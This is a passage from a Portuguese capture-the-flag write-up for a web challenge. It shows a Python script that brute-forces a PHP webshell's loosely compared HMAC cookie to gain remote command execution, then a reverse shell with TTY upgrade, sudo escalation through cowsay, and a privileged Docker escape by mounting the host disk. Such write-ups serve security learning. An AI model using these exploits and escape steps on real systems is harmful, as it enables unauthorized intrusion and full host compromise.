ela. Opa achamos uma flag!</p><p id="627a1dc8-7f2e-429e-88b8-dbe49311fb35" class="">
</p><figure id="d83f6ab8-48c4-4296-ade5-a394e76b56a3" class="image"><a href="UHCV33%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%20873289be05e84bb2a6c944b89409faa7/Untitled%2014.png"><img style="width:321px" src="UHCV33%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%20873289be05e84bb2a6c944b89409faa7/Untitled%2014.png"/></a></figure><figure id="2abb777d-af4c-4f2d-bcac-3fa9a166df46" class="image"><a href="UHCV33%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%20873289be05e84bb2a6c944b89409faa7/Untitled%2015.png"><img style="width:480px" src="UHCV33%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%20873289be05e84bb2a6c944b89409faa7/Untitled%2015.png"/></a></figure><h1 id="df9808fc-c4cd-49ce-80fd-2e25408ba5a7" class="">Exploitation - Part2 </h1><p id="89fb52f5-03c1-4f0c-b819-eb6663c286e4" class="">Pelo jeito é uma webshell com senha:</p><pre id="fbbb0cff-2804-4491-8d09-ca16b4aaaed8" class="code"><code>&lt;?php
$pass1 = $_GET[&#x27;pass1&#x27;];
$pass2 = $_GET[&#x27;pass2&#x27;];
$secret = file_get_contents(&#x27;../../secret&#x27;); // /var/www
$hmac_client = hash_hmac(&#x27;sha256&#x27;, $pass1, $pass2);
$hmac_server = hash_hmac(&#x27;sha256&#x27;, &#x27;Gu%40$!mN0123&#x27;, $secret);
$hmac_server =  (int)$hmac_server;
if($_COOKIE[&#x27;token&#x27;]){
    $hmac_client = $_COOKIE[&#x27;token&#x27;];
}; 


if($hmac_client == $hmac_server):
    setcookie(&#x27;token&#x27;, $hmac_client);
?&gt;</code></pre><p id="4c77d7e3-aa90-4cf5-a416-e5210dcf14d5" class="">Esse é o código, dando uma olhada ele faz uma hash usando a senha1(Gu%40$!mN0123) e a senha2 (conteúdo do ../../secret), e ele compara essa hash com a hash feita com os valores que o usuário passa via GET, porém existe um (int) que transforma a hash do servidor em um valor inteiro. Vamos reproduzir isso localmente...</p><pre id="8a0c4667-800a-4195-8613-0c505dbe0933" class="code"><code>&lt;?php
$secret = &quot;anything&quot;;
$hmac_server = hash_hmac(&#x27;sha256&#x27;, &#x27;Gu%40$!mN0123&#x27;, $secret);
echo &quot;hash: &quot;;
echo $hmac_server;
echo &quot; &quot;;
echo &quot;int: &quot;;
echo (int)$hmac_server;
?&gt;</code></pre><p id="4f0c979c-8b19-402a-b5e5-15fb6c39d97e" class="">Retorna:</p><figure id="8a335384-ac02-4f18-9233-c41f0915db74" class="image"><a href="UHCV33%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%20873289be05e84bb2a6c944b89409faa7/Untitled%2016.png"><img style="width:729px" src="UHCV33%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%20873289be05e84bb2a6c944b89409faa7/Untitled%2016.png"/></a></figure><p id="ae64f833-24af-4c25-a3bc-76c3b0f4065b" class="">Aqui vemos como essa conversão da hash para um numero inteiro funciona, o php pega então os primeiros números da hash com o (int) e compara com o valor passado pelo usuário, outra coisa legal é que o usuário pode passar esse valor via COOKIE..., logo poderemos declarar nosso cookie &quot;token&quot; para algum número inteiro e a comparação ira dar TRUE.</p><pre id="84fd9f63-23cf-4e05-af05-ce2b2b08e497" class="code"><code>if($hmac_client == $hmac_server): // vulnerable</code></pre><p id="7c4e23dc-d637-4987-a186-c327f0eeae70" class="">Vamos então encontrar um número inteiro que consiga gerar TRUE na comparação e bypassar a autenticação da webshell. Podemos ver no código que existe um parâmetro POST chamado cmd que é usado quando a autenticação retorna TRUE , e esse parâmetro é o código que será executado na webshell. Pensando nisso escrevi um exploit em python para fazer um bruteforce de valores numéricos no cookie até conseguir a autenticação e por fim rodar o comando que eu quiser na máquina.</p><pre id="59860d66-4296-4bfa-b44a-f6fcd39f9d97" class="code"><code>import requests
import sys
cmd = sys.argv[1]
url = &quot;http://34.219.224.183/uploads/webshell.php&quot;
for num in range(0, 1000):
        token = num
        print(&quot;[INFO] Testing: &quot;, token)
        cookies = {&#x27;token&#x27;: str(token)}
        r = requests.get(url, cookies=cookies)
        if len(r.text) != 565:
                print(&quot;[EXPLOIT] Token:&quot;, token, &quot;CMD:&quot;, cmd)
                payload = {&#x27;cmd&#x27;: cmd}
                a = requests.post(url, data=payload, cookies=cookies)
                print(a)</code></pre><figure id="795b7dc3-61cc-46c3-842b-bd8b539873a9" class="image"><a href="UHCV33%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%20873289be05e84bb2a6c944b89409faa7/Untitled%2017.png"><img style="width:1071px" src="UHCV33%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%20873289be05e84bb2a6c944b89409faa7/Untitled%2017.png"/></a></figure><p id="6352d7d3-0bff-4831-a40c-f0e7bba76383" class="">Funcionou o cookie que começa com 9, mesmo ja tendo RCE,  vamos setar o cookie e ver a webshell...</p><p id="f71ee611-a3ef-42da-a467-e4a0869bdaae" class="">Apenas setei o cookie para 9:</p><p id="4499bec1-9041-4dfb-8df8-e0b75a6327a1" class="">
</p><figure id="74544278-d4ba-4adb-9a25-b8cb1fac7e5d" class="image"><a href="UHCV33%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%20873289be05e84bb2a6c944b89409faa7/Untitled%2018.png"><img style="width:1366px" src="UHCV33%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%20873289be05e84bb2a6c944b89409faa7/Untitled%2018.png"/></a></figure><p id="e29c20a7-0ab6-4b66-9034-53d67a457dc3" class="">Uma webshell muito linda! Agora que temos RCE vamos pegar uma shell.</p><h1 id="781dd88f-c330-4b48-aca7-3977e642bb37" class="">Exploitation - Part3</h1><p id="d8ad961b-a38b-48ac-a2b9-bfb8fbbf7068" class="">Habemos Shel!</p><p id="4c23e9c3-27db-4334-acb3-85ee5ce59f74" class="">Eu utilizei um site para pegar a shell porém, eu poderia ter usado também o <a href="https://www.revshells.com/">https://www.revshells.com/</a> que é um gerador de comandos, para pegar uma shell, eu apenas coloco as informações e ele gera a payload para eu mandar para o servidor 😉.</p><figure id="0b669893-67b8-4485-95ce-41f58171e68a" class="image"><a href="UHCV33%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%20873289be05e84bb2a6c944b89409faa7/Untitled%2019.png"><img style="width:1048px" src="UHCV33%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%20873289be05e84bb2a6c944b89409faa7/Untitled%2019.png"/></a></figure><pre id="745339b2-0fe3-4d25-a5a7-e5518860d98b" class="code"><code>Full tty shell
in your rev-shell~ python3 -c &#x27;import pty; pty.spawn(&quot;/bin/bash&quot;)&#x27;
CTRL + Z
in your terminal~ stty raw -echo; fg
ENTER
in your rev-shell~ export TERM=xterm</code></pre><p id="4303bdac-ca2c-4d28-b0f2-5cb07dd46027" class="">Fazendo um recon básico com o &quot;sudo -l&quot; podemos ver que conseguimos rodar um programa com um outro usuário na maquina sem senha. </p><figure id="dabb2b76-9772-42d8-b913-3dfc24c4f4a8" class="image"><a href="UHCV33%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%20873289be05e84bb2a6c944b89409faa7/Untitled%2020.png"><img style="width:774px" src="UHCV33%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%20873289be05e84bb2a6c944b89409faa7/Untitled%2020.png"/></a></figure><p id="81f6979c-47ea-4f0b-9c07-88d3ecbdc261" class="">No caso o programa que podemos rodar é o cowsay:</p><figure id="456de79d-e09a-4bde-86ca-2d9a9b611521" class="image"><a href="UHCV33%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%20873289be05e84bb2a6c944b89409faa7/Untitled%2021.png"><img style="width:697px" src="UHCV33%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%20873289be05e84bb2a6c944b89409faa7/Untitled%2021.png"/></a></figure><p id="907b6c96-3799-4f23-a435-da94d566cf05" class="">Dando uma olhada no <a href="https://gtfobins.github.io/gtfobins/cowsay/">GTFObins</a> podemos ver como funciona o priv esc utilizando o cowsay:</p><figure id="eb8516f3-1c6b-4533-9a21-4b7db329b6b8" class="image"><a href="UHCV33%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%20873289be05e84bb2a6c944b89409faa7/Untitled%2022.png"><img style="width:432px" src="UHCV33%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%20873289be05e84bb2a6c944b89409faa7/Untitled%2022.png"/></a></figure><figure id="1a5a2145-7b71-44a9-b73b-b03b445ce571" class="image"><a href="UHCV33%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%20873289be05e84bb2a6c944b89409faa7/Untitled%2023.png"><img style="width:857px" src="UHCV33%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%20873289be05e84bb2a6c944b89409faa7/Untitled%2023.png"/></a></figure><p id="335442ac-12a3-4b2e-9a0e-ea5a0ee99c10" class="">Basicamente o argumento -f no cowsay nos permite setar o &quot;estilo&quot; da vaquinha, porém esse estilo é um script em perl, logo podemos escrever um template malicioso e mandar o cowsay executar, agora vamos apenas fazer isso.</p><figure id="db182016-075e-4e3e-839b-48b064364ac0" class="image"><a href="UHCV33%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%20873289be05e84bb2a6c944b89409faa7/Untitled%2024.png"><img style="width:631px" src="UHCV33%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%20873289be05e84bb2a6c944b89409faa7/Untitled%2024.png"/></a></figure><p id="d0198324-acc8-4296-97bc-a645b9139581" class="">Agora como usuário john rodando um &quot;ls -la&quot; na home dele podemos encontrar a próxima flag:</p><figure id="aefed51e-a958-4408-8c60-c7e625d64ddb" class="image"><a href="UHCV33%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%20873289be05e84bb2a6c944b89409faa7/Untitled%2025.png"><img style="width:513px" src="UHCV33%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%20873289be05e84bb2a6c944b89409faa7/Untitled%2025.png"/></a></figure><h1 id="9ca400d2-04ba-401d-9d04-15e4761f1531" class="">Exploitation - Part3</h1><p id="846c7664-8b2b-4a5f-a439-6deb8534a765" class="">Rodando novamente o &quot;sudo -l&quot; podemos rodar /bin/sh como root sem senha, então bora la pegar esse root!</p><figure id="221d7e9d-cc87-42a8-a8e1-91efd4c7d5fc" class="image"><a href="UHCV33%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%20873289be05e84bb2a6c944b89409faa7/Untitled%2026.png"><img style="width:767px" src="UHCV33%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%20873289be05e84bb2a6c944b89409faa7/Untitled%2026.png"/></a></figure><p id="e6a24561-33ae-404a-a2a5-e378a3e7bbee" class="">Ué, cade a flag? Esse root não foi muito facil?</p><figure id="d2c93d10-28fb-4578-89b6-012914c5bbd3" class="image"><a href="UHCV33%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%20873289be05e84bb2a6c944b89409faa7/Untitled%2027.png"><img style="width:534px" src="UHCV33%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%20873289be05e84bb2a6c944b89409faa7/Untitled%2027.png"/></a></figure><p id="19ebf432-936e-4c7f-bac1-abee617ee5eb" class="">Parece que estamos dentro de um docker e teremos que escapar dele, eu poderia testar algumas formas manuais de verificar como vamos fazer isso porém rodei uma tool chamada deepce que ja me deu uma dica de um possível vetor de ataque...</p><figure id="3a1aa508-23c2-4add-992d-4a39ebee6972" class="image"><a href="UHCV33%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%20873289be05e84bb2a6c944b89409faa7/Untitled%2028.png"><img style="width:432px" src="UHCV33%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%20873289be05e84bb2a6c944b89409faa7/Untitled%2028.png"/></a></figure><figure id="8707f38d-0fa1-49e4-93a2-238a3ed46d95" class="image"><a href="UHCV33%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%20873289be05e84bb2a6c944b89409faa7/Untitled%2029.png"><img style="width:793px" src="UHCV33%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%20873289be05e84bb2a6c944b89409faa7/Untitled%2029.png"/></a></figure><p id="c85ffbad-81e5-4610-898d-005e11338bcc" class="">Pelo jeito estamos em um container privilegiado, isso significa que podemos montar os arquivos do host dentro do nosso container ou até mesmo executar comandos no host.</p><p id="365660b8-0e22-4673-ba34-dcf8c595ac5f" class="">Vamos rodar um: (Para visualizar os discos do servidor do host)</p><pre id="2e0721cd-d253-4987-b1a4-b7eb6e35a381" class="code"><code>fdisk -l</code></pre><p id="6bd71c02-687f-46d1-b3c4-43002e2d4a85" class="">E então montar o disco no nosso container:</p><pre id="d82b5a6e-0b62-40af-bd7a-963ac21d140a" class="code"><code>mkdir -p /mnt/a
mount /dev/xvda1 /mnt/a</code></pre><p id="35082f03-1aac-4948-be56-6e1214f4752e" class="">Agora vamos usar o chroot aonde montamos o disco:</p><figure id="fb5976a4-7d5f-465c-a629-592b56cc6b81" class="image"><a href="UHCV33%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%20873289be05e84bb2a6c944b89409faa7/Untitled%2030.png"><img style="width:586px" src="UHCV33%20-%20(Classificato%CC%81ria%20-%20Web)%20Official%20Write-U%20873289be05e84bb2a6c944b89409faa7/Untitled%2030.png"/></a></figure><p id="6c6b823b-695b-42a1-b117-e300be0d3a5b" class="">E conseguimos! mais uma flag de brinde!</p><p id="b85adbd5-d71a-48b5-a2a9-81a02546ae2f" class="">Espero que tenham gostado, para você que leu até aqui, obrigado!</p><p id="302a3c5b-60b2-4de8-9966-766017f72509" class="">H4ckTh3Pl4n3t!</p></div></article></body></html>